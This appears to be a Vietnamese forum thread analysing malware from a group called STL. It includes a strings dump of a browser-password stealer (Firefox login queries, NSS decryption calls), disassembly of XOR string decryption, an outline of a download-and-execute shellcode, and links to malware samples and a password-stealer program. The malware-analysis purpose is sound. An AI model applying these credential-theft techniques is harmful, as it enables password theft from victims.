LeVuHoang — GMT

hi anh TQN, Anh có ý kiến gì về việc nhóm STL, khi thì code không chuẩn, khi thì dùng các undocumented không? Các kỹ thuật undocumented này nếu không phổ biến thì STL từ đâu mà có?

RCE đám virus của Sinh Tử Lệnh.

.lht. — GMT

Theo như lht theo dõi các bài viết của anh TQN, mình cảm thấy STL là 1 nhóm "tạp nham" hơn là 1 nhóm làm việc có quy tắc rõ ràng, nhất là như anh TQN phân tích về coding style. Ở đây code dup nhiều, thừa thãi -> copy và paste rõ ràng -> code hiểu không kĩ mà lấy cái có sẵn để dùng. Vậy thì để trả lời cho bạn LeVuHoang, mình nghĩ rất đơn giản ... Các hàm undocumented ở đây không hẳn là không có nhiều tài liệu về nó. Những bộ windows driver kit , windows nt source leaked, Wine và Reacos source là nguồn tài liệu dồi dào. Mà mình thấy trên mạng cũng có nhiều source example và các giải thích về các hàm undocument cũng không phải là không có ;))

RCE đám virus của Sinh Tử Lệnh.

quangredlight — GMT

Ôi, bác TQN có PatchDiff, x86emu với IDA 6.1 thì cho em với, em thì chỉ cần cái đấy thôi, :-S ,ko có nó dùng bản 5.5 vẫn hơn, chưa kể cái HexRay còn chưa có bản mới, em là em kết mỗi cái đấy của IDA, debug bằng IDA em chịu, toàn đọc code với emu thôi ạ:-S Mấy chỗ code mà bác nói là code lung tung ấy, em thì lại nghĩ khác. Cũng có thể bác đúng, mỗi người cắt lung tung rồi ghép vào, nhưng biết đâu cái kiểu copy lòng vòng lại là antiEmulator của các Av, code càng lung tung, emu làm càng rối, lỗi loạn lên, emu thì nhiều hãng làm nhưng có phải ai cũng chuẩn đâu . em là đang đoán thế ạ;;)

RCE đám virus của Sinh Tử Lệnh.

hoangphuvn — GMT

Bạn TQN share cho mình x86emu và PatchDiff đc ko nhỉ? ^^

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

x86emu: http://www.idabook.com/x86emu/index.html PatchDiff: http://code.google.com/p/patchdiff2/ Kể từ IDA 5.5, SDK của nó đã được chuẩn hoá và đóng băng, thay đổi rất ít. Vì vậy các plugin, loader... của các ver từ IDA 5.5 trở đi đều dùng được trong bản mới hơn (em viết vầy có lũng cũng không ha ?) Nếu các bạn đã có IDA 6.1 leak thì nên install thêm Bochs: http://bochs.sourceforge.net/. Debug với IDA 6.1 và Bochs đơn giản, thuận tiện hơn dùng x86emu. Em đã tìm ra lý do tại sao em bị mất password 1 loạt như vậy. Lúc trước nghi ngờ tụi STL này chạy được ct FireFoxPassView (của NiroSoft) trên máy mình, nhưng không phải. Cứ nghĩ hoài làm sao tụi nó lấy được một loạt password như vây. Nhưng giờ đã phát hiện ra. Tụi này có riêng 1 DLL chỉ làm nhiệm vụ lấy Yahoo Profile List, Internet History, Firefox pass.... Các bạn download Everything: http://www.voidtools.com/, search file: StaticCache.dat trong %Documents and Settings%. Xoá nó ngay lập tức = Unlocker, GMER... Đây chính là 1 dll làm nhiệm vụ ăn cắp và ghi lại toàn bộ thông tin về rất nhiều thứ của victim. Tên gốc của nó là CollectInfo.dll. Em mất pass vì chính file dll này. Đồng thời search file wab64.dll trong %Program Files%, xoá nó luôn. Tên nguyên thuỷ lúc coder STL build là sysclass.dll, cũng làm nhiệm vụ thu nhập thông tin về victim. Pesudo-C code của hai thằng này em sẽ post sau. Các bạn đang dùng Firefox nên dùng và đặt Master Password ngay. Nếu đã đặt Master Password thì các ct decrypt Firefox password sẽ vô dụng. PS: Em nói đúng không mấy anh STL ?

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Các bạn xem text string trong StaticCache.dat sẽ thấy tụi nó lấy cái gì trong máy của victim: Code:

.rdata:10004100 Software
.rdata:10004118 \r\n\r\n========================= Application List ==========================\r\n
.rdata:100041B0 \r\n
.rdata:100041B8 SELECT DISTINCT moz_places.url, moz_bookmarks.title FROM moz_places LEFT JOIN moz_bookmarks WHERE (moz_bookmarks.fk == moz_places.id) AND (moz_bookmarks.title  IS NOT NULL);
.rdata:10004270 ========================= Firefox Favorite ==========================\r\n
.rdata:10004300 \t\t
.rdata:10004308 SELECT hostname FROM moz_logins
.rdata:10004328 SELECT encryptedUsername FROM moz_logins
.rdata:10004354 SELECT encryptedPassword FROM moz_logins
.rdata:10004380 %s
.rdata:10004388 ========================= Firefox Username ==========================\r\n
.rdata:10004418 SELECT moz_places.url,moz_places.title FROM moz_historyvisits LEFT JOIN moz_places ON moz_historyvisits.place_id=moz_places.id ORDER BY moz_historyvisits.visit_date DESC LIMIT 500
.rdata:100044D0 ========================= Firefox Last Visited ==========================\r\n
.rdata:10004568 NSS_Init
.rdata:10004574 NSSBase64_DecodeBuffer
.rdata:1000458C PK11_GetInternalKeySlot
.rdata:100045A4 PK11_Authenticate
.rdata:100045B8 PK11SDR_Decrypt
.rdata:100045C8 NSS_Shutdown
.rdata:100045D8 PK11_FreeSlot
.rdata:100045E8 sqlite3_initialize
.rdata:100045FC sqlite3_open
.rdata:1000460C sqlite3_prepare_v2
.rdata:10004620 sqlite3_step
.rdata:10004630 sqlite3_column_text
.rdata:10004644 sqlite3_finalize
.rdata:10004658 sqlite3_close
.rdata:10004668 \\Mozilla\\Firefox\\profiles.ini
.rdata:100046A4 Path
.rdata:100046B0 Profile0
.rdata:100046C8 %s\\Mozilla\\Firefox\\%s\\compatibility.ini
.rdata:10004718 LastPlatformDir
.rdata:10004738 Compatibility
.rdata:10004754 LastAppDir
.rdata:1000476C mozcrt19.dll
.rdata:10004788 sqlite3.dll
.rdata:100047A0 %s\\%s
.rdata:100047AC nspr4.dll
.rdata:100047C0 plc4.dll
.rdata:100047D4 plds4.dll
.rdata:100047E8 softokn3.dll
.rdata:10004804 nss3.dll
.rdata:10004818 %s\\Mozilla\\Firefox\\%s\\places.sqlite
.rdata:10004860 %s\\Mozilla\\Firefox\\%s\\signons.sqlite
.rdata:100048B0 Local Settings\\Software\\Microsoft\\Windows\\Shell\\MuiCache
.rdata:10004928 ========================= Recent Application List ==========================\r\n
.rdata:10004A18 \r\n\r\n========================= Yahoo Profile List ==========================\r\n
.rdata:10004AB8 Software\\Microsoft\\Internet Explorer\\TypedURLs
.rdata:10004B18 ========================= Internet Explorer History ==========================\r\n
.rdata:10004BBC url%i
.rdata:10004BC8 SeDebugPrivilege
.rdata:10004BEC explorer.exe
.rdata:10004C08 *.doc*
.rdata:10004C18 *.xls*
.rdata:10004C28 *.ppt*
.rdata:10004C38 *.txt
.rdata:10004C44 *.php*
.rdata:10004C54 *.asp*
.rdata:10004C64 *.au
.rdata:10004C70 ========================= File List ==========================\r\n
.rdata:10004CF4 %s
.rdata:10004CFC Windows
.rdata:10004D0C Program Files
.rdata:10004D28 $Recycle.Bin
.rdata:10004D44 ProgramData
.rdata:10004D5C Config.Msi
.rdata:10004D74 System Volume Information
.rdata:10004DA8 Recovery
.rdata:10004DBC MSOCache
.rdata:10004DD0 PerfLogs
.rdata:10004DE4 AppData
.rdata:10004DF4 All Users
.rdata:10004E08 Program Files (x86)
.rdata:10004E30 RECYCLER
.rdata:10004E44 %s\\*

Coder STL dùng chính các Dll của Firefox và sqlite3.dll để decode các username, password mà Firefox lưu lại. Chúng tìm file profiles.ini rồi suy ra file compatibility.ini. Đọc file compatibility.ini để lấy Firefox install path, load một loạt các dll trên, GetProcAddress một loạt các function để decode rồi issus sql command cho sqlite3.dll, parse result trả về. Source của decrypt Firefox password có đầy trên mạng, vd các bạn có thể Google với "NSSBase64_DecodeBuffer" sẽ ra một loạt kết quả. Trong danh sách các file extension mà tuị này lấy, em không biết file .au là của cái gì, sao giống AutoIt quá vậy ? Bà con nào biết chỉ em với ! Vì file StaticCache.dat (CollectInfo.dll) này nhỏ, chỉ có vỏn vẹn 29 hàm, nhưng việc viết lại hoàn chỉnh C code của nó rất mất thời gian, nên em chỉ up lên mediafire file IDA61 idb, file StaticCache.dat và pesudo-C code mà HexRays tạo ra. Bà con nào biết lập trình C for Win có thể đọc file .c và hiểu được: http://www.mediafire.com/?ama8ftvsdo702w1 Tới gần đây, em vẫn tự hỏi: Quái, làm sao nó lấy được 1 loạt password như vậy được, mình có bao giờ gõ pwds vào đâu, Firefox tự làm hết mà. Không lý tụi này run được Firepassviewer trên máy em à. Tới chiều này, ngồi decode dao360.mui, mới lòi ra thêm một đống "meo què" của tụi STL này. À, sẵn tiện nhắc lại, toàn bộ "mèo què s" của STL em up ở đây: http://www.mediafire.com/?tz745o0f678w8 Và các bạn có để ý là tới bây giờ, tổng số file malware ("meo què") của STL cài vào mấy victim đã là 12 file .dll, .mui, .ocx rồi. Một coder không thể code một đống meo què như vậy được. Chúng toàn xài VC++ 2008, 2010 không, build ở mode UNICODE hết.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Và dưới đây là 1 đoạn ct nhỏ code = Delphi để lấy Firefox passwords: http://www.mediafire.com/?goj6zd0z3c1b2of Các bạn so sánh với code C trong file StaticCache.c sẽ thấy nó giống ở chức năng và cách dùng hàm, cách gọi hàm APIs của Firefox, chỉ thiếu phần execute SQLite3 cmds để lấy bookmarks...

RCE đám virus của Sinh Tử Lệnh.

mv1098 — GMT

TQN wrote:

Trong danh sách các file extension mà tuị này lấy, em không biết file .au là của cái gì, sao giống AutoIt quá vậy ? Bà con nào biết chỉ em với !

Primary association: uLaw/AU Audio File File classification: Audio Mime type: audio/basic, audio/x-basic, audio/au, audio/x-au, audio/x-pn-au, audio/rmf, audio/x-rmf, audio/x-ulaw, audio/vnd.qcelp, audio/x-gsm, audio/snd Identifying characters Hex: 2E 73 6E 64 00 00 00 , ASCII: .snd Related links: IrfanView, AudioPlayer, FILExt CODEC and Video Player FAQ Other applications associated with file type AU: Audacity (Audio Block)Audacity is free, open source software for recording and editing sounds. It is available for Mac OS X, Microsoft Windows, GNU/Linux, and other operating systems. This association is classified as Audio. The identifying characters used for this association are - Hex: 64 6E 73 2E , ASCII: dns Theo mình .AU3 hình như mới là định dạng của AutoIt

RCE đám virus của Sinh Tử Lệnh.

ngocson2vn — GMT

Chào bác TQN, Em tìm thấy trong máy em (em dùng Windows 7 64bit) có hai file StaticCache.dat tại: C:\Windows\Fonts\StaticCache.dat C:\Windows\winsxs\amd64_microsoft-windows-font-staticcache_31bf3856ad364e35_6.1.7600.16385_none_3fd354fc52b76f63\StaticCache.dat Vậy máy em có bị nhiễm đám virus này không ạ?

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Cậu dùng PEiD check xem 2 file đó có phải là PE file không ? StaticCache.dat của STL nằm trong \Documents and Settings\%User%\Application Data

RCE đám virus của Sinh Tử Lệnh.

ngocson2vn — GMT

Em đã check cả 2 files. Rất may là không phải PE files bác ạ. Em chờ để đọc các bài tiếp theo của bác.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Có một người tui không biết vừa gởi cho tui 1 số file mới mà theo người đó là virus mới của STL. Điều này tui không chắc. Nhưng phân tích sơ bộ thì các file này được viết = VB.NET, protect = Smart Assembly và DotNet Reactor v4.x. Sau khi unpack chúng ra xong, thì thấy ngay đám malwares mới này cũng dùng các API và SQLite3 y như StaticCache.dat. Mục đích là ăn cắp user name và passwords của victim từ Google Chrome, FireFox, IE, GoogleTalk... và sưu tầm một loạt thông tin về máy của victim và dùng mail và FTP để gởi đi. Bộ mấy con này của mấy anh STL à, sao mấy anh không viết = VC++ nữa mà chuyển dang dùng VB.NET. Vậy thì mấy anh càng chết nữa, càng dể lộ thông tin về mấy anh rồi. Rongchaua ơi, vào đây giúp anh nè, có việc đúng chuyên môn về RE .NET của em đấy. Bây giờ em phải đi gấp rồi, tối về em unpacked và deobfuscation xong rồi em up lên.

RCE đám virus của Sinh Tử Lệnh.

maithangbs — GMT

Bác TQN bình tĩnh, bác không nghĩ là bọn Tung của có biết tiếng Việt à? Hoặc Có thằng nào ghét bác à?

RCE đám virus của Sinh Tử Lệnh.

xnohat — GMT

TQN wrote:

Có một người tui không biết vừa gởi cho tui 1 số file mới mà theo người đó là virus mới của STL. Điều này tui không chắc. Nhưng phân tích sơ bộ thì các file này được viết = VB.NET, protect = Smart Assembly và DotNet Reactor v4.x. Sau khi unpack chúng ra xong, thì thấy ngay đám malwares mới này cũng dùng các API và SQLite3 y như StaticCache.dat. Mục đích là ăn cắp user name và passwords của victim từ Google Chrome, FireFox, IE, GoogleTalk... và sưu tầm một loạt thông tin về máy của victim và dùng mail và FTP để gởi đi. Bộ mấy con này của mấy anh STL à, sao mấy anh không viết = VC++ nữa mà chuyển dang dùng VB.NET. Vậy thì mấy anh càng chết nữa, càng dể lộ thông tin về mấy anh rồi. Rongchaua ơi, vào đây giúp anh nè, có việc đúng chuyên môn về RE .NET của em đấy. Bây giờ em phải đi gấp rồi, tối về em unpacked và deobfuscation xong rồi em up lên.

Không khéo lão thành tester miễn phí cho các bạn STL đấy TQN à. Biết đâu các bạn này học được chút thâm bẩn của mấy bạn tàu rồi chăng ? B-)

RCE đám virus của Sinh Tử Lệnh.

xnohat — GMT

Tớ cũng dính StaticCache.dat , Dùng OllyDBG load lên ( máy ảo ) thì đúng là nó, nguyên con luôn, Reference Strings hoàn toàn như lão đưa. Nhưng chỉ duy nhất file đó được tìm thấy, các file khác lão đề cập thì không thấy. Vậy chỉ 1 file DAT ( PE File ) đó thì làm sao dc load lên mà quậy phá lung tung dc lão ? Liệu còn file nào liên quan tới file này không lão ? Mong lão chỉ giúp để xử lý con này rốt ráo khỏi máy tớ. Tớ ngoại đạo hoàn toàn về khoản RCE này :(

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

maithangbs wrote:

Bác TQN bình tĩnh, bác không nghĩ là bọn Tung của có biết tiếng Việt à? Hoặc Có thằng nào ghét bác à?

Hì hì, quả thực bọn tung của biết tiếng Việt mà chơi trò STL thì không có gì để nói. Chỉ có điều đám này là người Việt nhưng thích làm tung của và toàn lấy tên tung của và chơi trò STL mới là chuyện đáng nói.

RCE đám virus của Sinh Tử Lệnh.

secmask — GMT

một ít em xem được từ dao360.dll Code:

.code:10005174                 push    "%CSIDL_APPDATA%"   ; csidl
.code:10005176                 lea     ecx, [esp+630h+FileName] ; Load Effective Address
.code:1000517D                 push    ecx             ; pszPath
.code:1000517E                 push    ebx             ; hwnd
.code:1000517F                 mov     [esp+638h+NumberOfBytesWritten], ebx
.code:10005183                 call    ds:SHGetSpecialFolderPathW ; Indirect Call Near Procedure
.code:10005183
.code:10005189                 test    eax, eax        ; Logical Compare
.code:1000518B                 jnz     short loc_100051A5 ; Jump if Not Zero (ZF=0)
.code:1000518B
.code:1000518D                 pop     ebx
.code:1000518E                 mov     ecx, [esp+624h+var_4]
.code:10005195                 xor     ecx, esp        ; Logical Exclusive OR
.code:10005197                 call    check_esp       ; Call Procedure
.code:10005197
.code:1000519C                 add     esp, 624h       ; Add
.code:100051A2                 retn    8               ; Return Near from Procedure
.code:100051A2
.code:100051A5 ; ---------------------------------------------------------------------------
.code:100051A5
.code:100051A5 loc_100051A5:                           ; CODE XREF: sub_10005120+6Bj
.code:100051A5                 push    ebp
.code:100051A6                 push    edi
.code:100051A7                 lea     edx, [esp+630h+pMore] ; Load Effective Address
.code:100051AB                 push    edx
.code:100051AC                 mov     eax, offset sz2F0D4D010D1E1A0E207C300A1B0406060F110D2632 ; "2F0D4D010D1E1A0E207C300A1B0406060F110D2"...
.code:100051B1                 call    decryptString   ; \Identities\Thumbs.db

File thumbs.db này chứa dữ liệu thu thập, mã hoá bằng xor. Code:

.code:1000527A                 mov     edi, [esp+630h+arg_0]
.code:10005281                 push    4               ; flProtect
.code:10005283                 push    1000h           ; flAllocationType
.code:10005288                 inc     edi             ; Increment by 1
.code:10005289                 push    edi             ; dwSize
.code:1000528A                 push    0               ; lpAddress
.code:1000528C                 call    ds:VirtualAlloc ; Reserves or commits a region of pages in the virtual address space of the calling process.
.code:1000528C                                         ; Memory allocated by this function is automatically initialized to zero, unless MEM_RESET is specified.
.code:1000528C
.code:10005292                 mov     ebx, eax
.code:10005294                 push    ebx
.code:10005295                 mov     ecx, esi
.code:10005297                 call    private_encrypt_xor ; Call Procedure

các string decode được từ dao360.dll

file IDA6.1 em đang phân tích ở đây http://www.mediafire.com/?3m3asb44lgfy3uk Nhìn trong mớ string decode được thì còn vài file dll nữa chưa có trong chỗ anh TQN up lên, reverse đủ bộ chắc oải quá.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Anh chỉ biết nói một câu, good job, secmarsk. Em đã decode hết cho anh rồi. Lúc đầu anh tính viết IDC hay IDAPython, hay C/C++ để decode cái đống string encoced này, nhưng nói thật là lười quá, tối là anh rảnh, nhưng đã "sương sương" mất tiêu rồi, thì làm sao code được. Đúng là hậu sinh khả uý. Khen em n câu. Đúng như anh đoán, thằng dao này là core của đám "mèo què" của STL này. Nó lấy thông tin từ msdata.vxd, StaticCache.dat để up lên. Em còn thiếu cái IP, host mà nó up lên dùng smtp và ftp đấy. Thằng này nó dùng tới 3, 4 hàm decode lận. Rảnh rổi thì post tutor làm sao em call được hàm decryptString của em nhé: AppCall, Bochs hay x86emu ?

RCE đám virus của Sinh Tử Lệnh.

secmask — GMT

Mấy chỗ nó kết nối http ra ngoài hình như đọc địa chỉ từ pipe, em chưa đụng tới mấy cái đó. Em tay bo decode chỗ kia dùng olly thôi, em đang tính cách làm tool chạy decode kiểu này về sau dùng :D.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức.

RCE đám virus của Sinh Tử Lệnh.

chiro8x — GMT

TQN wrote:

Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức.

Không lẽ lủ virus đó được ra lệnh để huỷ data trên HDD ?.

RCE đám virus của Sinh Tử Lệnh.

micr0vnn — GMT

pó chíu... ko phải đân RCE pó ... cố cxung không thể hiểu

RCE đám virus của Sinh Tử Lệnh.

conmale — GMT

chiro8x wrote:

TQN wrote:

Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức.
Không lẽ lủ virus đó được ra lệnh để huỷ data trên HDD ?.

Hôm nay mới thấy cái ý kiến khá nhảm này. Bồ chỉ sợ bị huỷ data trên HDD thôi sao? Vậy nếu data không bị huỷ mà bị đánh cắp hay chính máy của bồ được dùng làm zombie để phá hoại người khác thì không sao?

RCE đám virus của Sinh Tử Lệnh.

chiro8x — GMT

conmale wrote:

chiro8x wrote:

TQN wrote:

Khẩn cấp: Mọi người nên đọc theo list các decode string của secmask và kiểm tra trên máy mình ngay. Nếu có file nào giống trong list trên và là PE file thì xoá ngay lập tức.
Không lẽ lủ virus đó được ra lệnh để huỷ data trên HDD ?.
Hôm nay mới thấy cái ý kiến khá nhảm này. Bồ chỉ sợ bị huỷ data trên HDD thôi sao? Vậy nếu data không bị huỷ mà bị đánh cắp hay chính máy của bồ được dùng làm zombie để phá hoại người khác thì không sao?

Em đâu có làm gì đâu mà sợ anh, chỉ toàn tài liệu. @Hôm nay mới đọc kĩ hết lại, nhìn mấy đoạn code disasm thấy nãn quá, đã bỏ công viết virus rồi cũng không làm luôn mấy cái hàm decrypt string cho ra hồn. Coding chắp vá xem cũng hại não. Mà SLT dạo này chìm nhỉ chẳng thấy nữa !. Mấy idol này lặn nhanh quá, chắc mấy anh đang đợi một lần xuất hiện chói loá, với những kiến thức vừa được dạy.

RCE đám virus của Sinh Tử Lệnh.

TQN — GMT

Nó ngủ rồi thì để nó ngủ đi em, đánh thức nó dậy làm chi, khổ lắm.

RCE đám virus của Sinh Tử Lệnh.

chiro8x — GMT

TQN wrote:

Nó ngủ rồi thì để nó ngủ đi em, đánh thức nó dậy làm chi, khổ lắm.

Em có đọc qua một số các source virus của nhóm coderz củ, tài liệu của nhóm này từ năm 1999-2003 nhưng phần lớn virus của họ được decrypt rất hay và sử dụng nhiều biện pháp mã hoá đơn giản và rất hiệu quả. Việc tính toán địa chỉ của các API rất ngắn gọn và thông minh, ngoài ra mấy cái code không kèm theo debug info như của mấy anh SLT idol này, nói thật thì mấy anh này làm em chẳng thấy có thiện cảm lắm, em chỉ muốn nói về mặt kỹ thuật thôi. Coding virus như mấy anh thì nãn thật. Mà thấy SLT viết virus bằng Visual Studio :| không lẽ đây là mốt mới. Em thấy có phần đầu là hay thôi còn về sau thì thấy cũng đỡ hay (em không có ý nói anh TQN nhé). Bài viết của anh TQN rất dễ hiểu mặc dù em chỉ học qua TASM32 chứ không có kiến thức về RE. Lúc nào em thử coding 1 em rồi nhờ anh TQN chỉ giáo thêm mới được. Nhưng chắc là lâu :D, em đang đợi xem mấy idol của em toả sáng =)).

RCE đám virus của Sinh Tử Lệnh.

bolzano_1989 — GMT

TQN wrote:

Tiếp tục nào anh em, ta sẽ đi tiếp với wbmain.dll. File này nguyên bản được pack = PE Compact. Em đã manual unpack nó ra, dể dàng, do tụi STL này không biết cách dùng các plugin của PE Compact. File đã unpack là file em đã up lên mediafire. Em chỉ nhớ hồi mấy tháng trước em cách ly nó từ thư mục
Đây là MS Rich data của wbmain.dll:

Thằng code hardkbd.dll lại hớ hênh, build với debug info, không xoá debug info nên thư mục source code của nó còn nằm chình ình trong file dll:

Bà con gấu gồ với key: CyberGame thì sẽ tìm ra điều thú vị. Không lẽ có dính đến học viên của Aptech à ???? Qua debug info của hardkbd.dll, ta có thể kết luận, thằng coder STL này create project với name là ieframe.dll, sau đó nó mới đổi tên ieframe.dll thành hardkdb.dll và ieframe.ocx. Vậy chắc có lẽ ieframe.ocx không cần nữa, nhưng nếu ai đó up cho tui thì tốt. Trong wbmain.dll, STL coder này dùng một số hàm API WinHttp rất ít dùng, ít phổ biến (thậm chí em khi còn là coder cũng không biết tới, chỉ biết WinInet API, sau này search tới search lui mới biết). Các hàm WinHttp này nằm trong Winhttp.dll, khi build include Winhttp.h và link với Winhttp.lib:

Và HTTP header của nó:

Google với key WinHttpOpen, chỉ những trang tiếng Việt, nó cho ta topic (theo tui là chính xác nhất, cả Gecko gì đó luôn): http://forums.congdongcviet.com/showthread.php?p=202006#post202006 Không biết lequochoang2 này là ai, và sorry Kevin Hoàng nhé, em có dính dáng gì không ? À mà quên, cái Gecko string này chỉ là 1 trong 1 đống Gecko string của tụi nó, từ từ em post sau. Thằng coder wbmain.dll này dùng tá lã hết, copy code hả em, khi thì dùng socket API, khi thì dùng WinHttp API. Em chả hiểu nổi nữa. Bà con đừng giận em câu giờ, câu bài nhé, thích thì em mới làm thôi. Cái của nợ dll, exe này em có từ năm ngoái lân, nhưng chưa bao giờ RCE xong xuôi, ra đầu ra đũa cả. Bây giờ mới móc ra mà làm, post lên ! Sao có mình em độc diễn vầy nè, buồn quá ! Bà con reversers khác vào tham gia cho vui chứ !

Lạ thật, một ảnh anh TQN gửi ở trên đã bị xóa rồi: http://img830.imageshack.us/img830/7923/hardkbddbginfo.gif Chắc ban quản trị forum phải tiếp tục backup các ảnh anh TQN đã gửi lên rồi. Theo mình biết thì hiện tại vẫn có nơi ở Việt Nam đang tiếp tục tuyển các lập trình viên đang hoặc đã từng viết malware, trojan, virus,... Nhu cầu này bức thiết đến nỗi cho phép làm việc từ xa nữa :( . Bài sau cũ rồi, tình cờ đọc được: Tác giả virus VLove là sinh viên FPT Aptech http://fpt.aptech.edu.vn/chitiet.php?id=616

RCE đám virus của Sinh Tử Lệnh.

MinhHung1122 — GMT

TQN wrote:

Bây giờ em cũng mệt rồi, nên em chỉ nói ngắn gọn các công đoạn của shellcode: 1. Tạo URL string. 2. Tạo API name bằng cách mov từng DWORD API name vào buffer. 3. Lấy PEB address, duyệt module link list để lấy kernel32.dll base address 4. Scan export table của kernel32.dll để lấy address của GetProcAddress 5. Download file image.jpg về %Temp%\randomname 6. Nếu download thành công, call CreateProcess với param là file jpg đó. File đó thực chất là file exe, mở đường cho download một loạt malware khác của mấy "ông nội" STL về máy victim (lại victim nữa, nhắc lại niềm đau của em). 7. Nếu download không thành công, TerminateProcess luôn (WinWord đi luôn).

nếu như thế thì cần phải xác định được hệ điều hành của victim à ->với asrl+dep thì đi ăn cám

RCE đám virus của Sinh Tử Lệnh.

MinhHung1122 — GMT

mà quên nữa, máy cái lỗi cve hay j j đó được công bố trước kia có thể được chỉnh sửa lại để by pass :))